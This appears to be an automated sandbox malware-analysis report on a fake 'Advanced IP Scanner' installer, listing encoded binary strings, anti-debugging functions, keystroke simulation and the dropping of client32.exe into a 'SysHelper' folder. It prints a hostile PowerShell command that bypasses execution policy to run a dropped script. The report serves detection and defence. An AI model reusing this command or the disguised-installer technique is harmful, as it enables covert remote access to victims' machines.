y7rkw3/iqvtL2YEH0L4GYKhu8bDEf3yJErOuUMJfxFVVPF5o2JZtWrIHYwz1+02W87XokwnVhG57l2Yb9mev/M8jCg+Y0fYbFYGoeWDbUMnktskKJUPDbnhZq+p5kVQz9EpbjS+nIL5mRKHp/K0m4XtiUpo+eHfm1e9f0rwhkcshh0fcteIiWcO8mNJS2HsKT6K24P6SeS+mMm9Bf0Ti3k0XyTLZRXIn/3QWsITQCcPTCaiqptfDz8jF0AaIflmlElSBMrYLSw3WLVIZGj7IxDPak3TYNVmFJ/o66KfKRV40urPhbF6ul7vyOr0jM6WhsELRUFiRrqGAL77WOaih8GLfYFJDYQkVT3Fb5+D5euNQXMVQiSjLYYn4CyWWom/rOTvaZuSq64qY1E2HkAijx+F0eZXkik61bxWUK8+diKc2Be2hF6Blqt0P/mJaLofzS+mMh8KBLJ5VzbYgbti8glDYX6Agxi6FDvMDSK7TkUosSfUXsbPaQ714
Source: unins000.dat.1.dr	Binary or memory string: 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
Source: unins000.dat.1.dr	Binary or memory string: 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
Source: unins000.dat.1.dr	Binary or memory string: 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
Source: unins000.dat.1.dr	Binary or memory string: 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
Source: unins000.dat.1.dr	Binary or memory string: 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
Source: TCCTL32.DLL.5.dr	Binary or memory string: >localhost:%d%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesvirtualVMWarevirt0000000000%02X%02X%02X%02X%02X%02XBluetoothpfntcctlex.cppRtlIpv6AddressToStringWntdll.dllntohlTCREMOTETCBRIDGE%s=%s
Source: client32.exe, 00000008.00000003.2160238304.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000008.00000002.2160470138.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.2245314103.000000000071F000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2248759340.0000000000722000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	API call chain: ExitProcess graph end node			graph_7-80851
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_1116A559 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_1116A559

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_110CFCF0 _memset,_strncpy,CreateMutexA,OpenMutexA,GetLastError,wsprintfA,OutputDebugStringA,

7_2_110CFCF0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

7_2_11029230

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_11178A14 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

7_2_11178A14

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11030B10 SetUnhandledExceptionFilter,	7_2_11030B10
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1116A559 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_1116A559
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1115E4D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_1115E4D1
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685B28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_685B28E1
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11030B10 SetUnhandledExceptionFilter,	8_2_11030B10
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1116A559 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_1116A559
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1115E4D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_1115E4D1

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1"

Contains functionality to execute programs as a different user

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_110F2280 GetTickCount,LogonUserA,GetTickCount,GetLastError,

7_2_110F2280

Contains functionality to simulate keystroke presses

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_11027BE0 keybd_event,keybd_event,keybd_event,keybd_event,keybd_event,keybd_event,keybd_event,

7_2_11027BE0

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1"			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\SysHelper\client32.exe "C:\Users\user\AppData\Roaming\SysHelper\client32.exe"			Jump to behavior

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_1109D4A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,

7_2_1109D4A0

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_1109DC20 GetProcAddress,GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,

7_2_1109DC20

Source: client32.exe, 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: client32.exe, 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: Shell_TrayWnd
Source: client32.exe, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: Progman

Language, Device and Operating System Detection

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	7_2_11170208
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	7_2_1117053C
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	7_2_11170499
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: GetLocaleInfoA,	7_2_11167B5E
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	7_2_11170106
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	7_2_111701AD
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	7_2_11170011
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	7_2_111703D9
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	7_2_11170500
